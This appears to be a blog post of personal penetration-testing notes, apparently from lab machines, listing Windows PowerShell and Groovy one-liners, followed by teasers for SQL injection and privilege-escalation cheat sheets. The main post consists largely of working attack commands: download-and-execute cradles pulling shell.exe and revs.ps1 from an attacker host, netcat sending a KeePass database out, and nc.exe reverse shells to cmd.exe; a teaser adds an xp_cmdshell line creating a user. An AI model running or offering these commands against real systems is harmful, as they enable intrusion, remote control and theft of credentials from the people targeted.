Skip to main content

Some Powershell Commands

By 
Download a File using Power Shell:

powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.14.19:8001/41015.exe', 'shell.exe')

Download a File Using Power Shell:

nc.exe 10.10.14.19 8002 < CEH.kdbx

Download and Execute Powershell Script on Victim Machine

Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")

python -m SimpleHTTPServer 8001

nc -nvlp 9001

#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1 
Download and Execute Powershell Script on Victim Machine - Method II 

powershell Invoke-WebRequest -Uri 10.10.14.35:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe 

python -m SimpleHTTPServer 8001

C:\users\administrator\downloads\nc.exe -e cmd 10.10.14.35 9001 

nc -nvlp 9001

Execute a Command in Java Shell:

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
Execute a Command in Java Shell:
println "cmd.exe /c dir".execute().text
Upload a file using Power shell: in a java shell
def process = "powershell -command Invoke-WebRequest 'http://10.10.14.19:8001/nc.exe' -OutFile nc.exe".execute();
println("${process.text}");
Get a Reverse Shell using Powershell:
def process = "powershell -command ./nc.exe 10.10.14.19 9001 -e cmd.exe".execute(); 
println("${process.text}");

nc.exe should be in the same directory; use the above command to download it. 
Check for Hidden Files:

 get-content .\root.txt -stream *

 get-content .\root.txt -stream root.txt











































Comments











Post a Comment



















Popular posts from this blog



















SQL DB & SQL Injection Pentest Cheat Sheet












By
























  1) MSSQL Injection Cheat Sheet | pentestmonkey   2) xp_cmdshell | Red Team tales   3) PentesterMonkey SQL Injection Cheatsheet    Use dbeaver  for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports  Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS)  Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP  MongoDB : 27017,27018,27019/TCP   PostgreSQL: 8432/TCP  MySQL: 3306/TCP  SQL DB Enum with nmap:  nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS  nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"  nmap -Pn -n -sS —script=ms-sql-xp-cmds...




















Post a Comment









Read more




























Windows Priv Escallation 












By
























  1.     Windows Privilege Escalation Commands  _ new   2.     Transferring Files to Windows   3.    Priv Esc Commands   4.    Priv Esc Guide    5.    Payload All the Things --> great Coverage    6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest      8. Kerberos Attacks Explained     9. How to Attack Kerberos 101       Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info   check for Non-windows processes in windows using netstat   Step 1: Check net user and admin and user rights     Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1.     Step 3: Try to get Meterpreter.     Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM  etc.     Step 5: check for weird programs  and registry.  Step 6: If the box is Domain Controller - Enum  - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD En...




















Post a Comment









Read more






























Forensics  & Crypto












By
























 Online Decoder --> https://2cyr.com/decode/  Encoding errors -->  https://ftfy.now.sh/  File Signatures List -->  Click here  PCAP Analysis:  -->  https://www.packettotal.com/   Online Cipher Decryptors:   CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r  Decrypt Any Kind of Hash   1)  Cipher Statistics  2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool  3)  Tools List (Awesome and Fantastic Tools) Available on dCode  4)  Solve an Aristocrat or Patristocrat  5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data  5-1)  RSA - Find PQ using N  6)  BertNase's Own Hide content in a Image made of blocks - npiet fun!  7)  Vigenere Solver - www.guballa.de  8)  Fernet (Decode)  9)  Unicode Text Steganography Encoders/Decoders  10)  All in ONE encoders and Decoders Tool  11) Cryptii - Decoder   Image Forensics:   1)  Forensical...




















Post a Comment









Read more